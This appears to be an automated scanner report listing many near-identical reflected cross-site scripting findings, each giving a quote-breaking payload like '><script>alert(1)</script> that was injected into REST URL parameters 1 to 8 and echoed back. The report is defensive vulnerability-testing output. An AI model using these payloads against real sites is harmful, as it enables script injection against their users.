The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b616b'><script>alert(1)</script>b774bbd66e1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 58282'><script>alert(1)</script>e844c762b7a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ad24f'><script>alert(1)</script>80b0e78178b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4cf7a'><script>alert(1)</script>4971be75db1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3b91e'><script>alert(1)</script>09a0fb82f54 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 80300'><script>alert(1)</script>a8fa8110624 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1ff16'><script>alert(1)</script>776fd51402b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e25ea'><script>alert(1)</script>76e833ea6be was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6526f'><script>alert(1)</script>a83c4abad5c was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c5a0d'><script>alert(1)</script>9c48b8d5610 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f4f27'><script>alert(1)</script>30edce3703c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d427b'><script>alert(1)</script>df1388f24cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f9f67'><script>alert(1)</script>c9c54c00294 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3443b'><script>alert(1)</script>0d75aba846e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2bc2c'><script>alert(1)</script>aa458b12de5 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dc7bf'><script>alert(1)</script>385b89604bb was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6771b'><script>alert(1)</script>d3895153ec4 was submitted in the REST URL parameter 8. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 86b10'><script>alert(1)</script>64da57a4779 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7359e'><script>alert(1)</script>46e6790cd1d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 40d14'><script>alert(1)</script>a7a3b400c0b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2af3b'><script>alert(1)</script>983fadd018c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload da6b2'><script>alert(1)</script>50d9790c04d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9aea8'><script>alert(1)</script>4cffde98153 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 73511'><script>alert(1)</script>c5406345189 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9c661'><script>alert(1)</script>0a62e16d3fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8cfc3'><script>alert(1)</script>4c747395f1e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 57892'><script>alert(1)</script>525c9a42ecb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e61b2'><script>alert(1)</script>38c945aceb9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fea05'><script>alert(1)</script>78d28eed1ea was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 95ae9'><script>alert(1)</script>7c6187b617e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b330d'><script>alert(1)</script>bff079bfb71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d1140'><script>alert(1)</script>fcee36dbee2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e88c2'><script>alert(1)</script>700ae535ace was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 57c7c'><script>alert(1)</script>8e290d4d4b1 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bb6be'><script>alert(1)</script>8d96e95fe62 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7eacf'><script>alert(1)</script>d48d4e06152 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 57d66'><script>alert(1)</script>76b8e23b5fc was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 67dd9'><script>alert(1)</script>e6672341f07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 45272'><script>alert(1)</script>3dbce6c32cb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fa182'><script>alert(1)</script>389433e4b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6f8be'><script>alert(1)</script>ecb418fd4bc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6ed9e'><script>alert(1)</script>d07b7742900 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7f4e8'><script>alert(1)</script>6f14cf79154 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload beed3'><script>alert(1)</script>9463b547838 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 850d2'><script>alert(1)</script>c70be2247dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3ce65'><script>alert(1)</script>b37c89188f6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ee6ff'><script>alert(1)</script>31bf7d50746 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5e118'><script>alert(1)</script>e29be4ee5ec was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2797b'><script>alert(1)</script>45814a816fe was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7b300'><script>alert(1)</script>e4786235842 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 51dad'><script>alert(1)</script>c4216718c01 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fe184'><script>alert(1)</script>49d61624d15 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4c28f'><script>alert(1)</script>fdedb6665a6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6b716'><script>alert(1)</script>dda84e2edf4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 163d2'><script>alert(1)</script>4b5a7551963 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eee62'><script>alert(1)</script>b63610413e9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c54bd'><script>alert(1)</script>8fe9eea30f1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 781de'><script>alert(1)</script>e81528b2b32 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5e69b'><script>alert(1)</script>46d1ba68732 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload dead9'><script>alert(1)</script>a661e998c72 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 25748'><script>alert(1)</script>75ed48546ec was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c8e67'><script>alert(1)</script>ca432139a7a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ae05e'><script>alert(1)</script>43a96c8bc9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 60e66'><script>alert(1)</script>4ab2a96df69 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5c704'><script>alert(1)</script>00646f627ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a7012'><script>alert(1)</script>d2de17d9c7b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 47f83'><script>alert(1)</script>2aab50242fe was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 32db0'><script>alert(1)</script>e3defa49987 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e7019'><script>alert(1)</script>130f6c59733 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 309f3'><script>alert(1)</script>31a8c96ed6e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 99c72'><script>alert(1)</script>eae5e6a3cc4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e1ebe'><script>alert(1)</script>3798814995b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2a69c'><script>alert(1)</script>0c1d6eb895b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4c320'><script>alert(1)</script>bad0db87fa was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e1723'><script>alert(1)</script>cf327814464 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 93eb6'><script>alert(1)</script>a65d0178827 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f0f7d'><script>alert(1)</script>fd76200fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload abb17'><script>alert(1)</script>14015bc97f2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 460ff'><script>alert(1)</script>492f1e3448f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 76b39'><script>alert(1)</script>7c51dd0891d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1b8d6'><script>alert(1)</script>b173df45538 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 614c9'><script>alert(1)</script>c3c334660e8 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9bae4'><script>alert(1)</script>fdef7069a02 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 36da9'><script>alert(1)</script>33368b0c8e5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 76bd9'><script>alert(1)</script>6580d333bc2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cdf59'><script>alert(1)</script>34dfe38079a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e7033'><script>alert(1)</script>a79b52bccc2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d7f93'><script>alert(1)</script>892d77dffdd was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 78aaa'><script>alert(1)</script>52349422dc4 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b3518'><script>alert(1)</script>7dca366f979 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eb965'><script>alert(1)</script>4afbf610026 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 108df'><script>alert(1)</script>14fd32ebc1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 65a1e'><script>alert(1)</script>2fe9ad35a2f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1f854'><script>alert(1)</script>c2d270a63cb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1ac00'><script>alert(1)</script>c01740cc31a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e5f86'><script>alert(1)</script>0fa6f5f0ec2 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9cec8'><script>alert(1)</script>4468d0104c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 48113'><script>alert(1)</script>addd1ac20d6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bb436'><script>alert(1)</script>6e1c1c1f702 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ec7cf'><script>alert(1)</script>b152d7baeb9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload eed32'><script>alert(1)</script>685d8755ea0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a5e27'><script>alert(1)</script>805a85f0a14 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 39625'><script>alert(1)</script>ab29d75d606 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 47bd5'><script>alert(1)</script>45b1450fbe6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
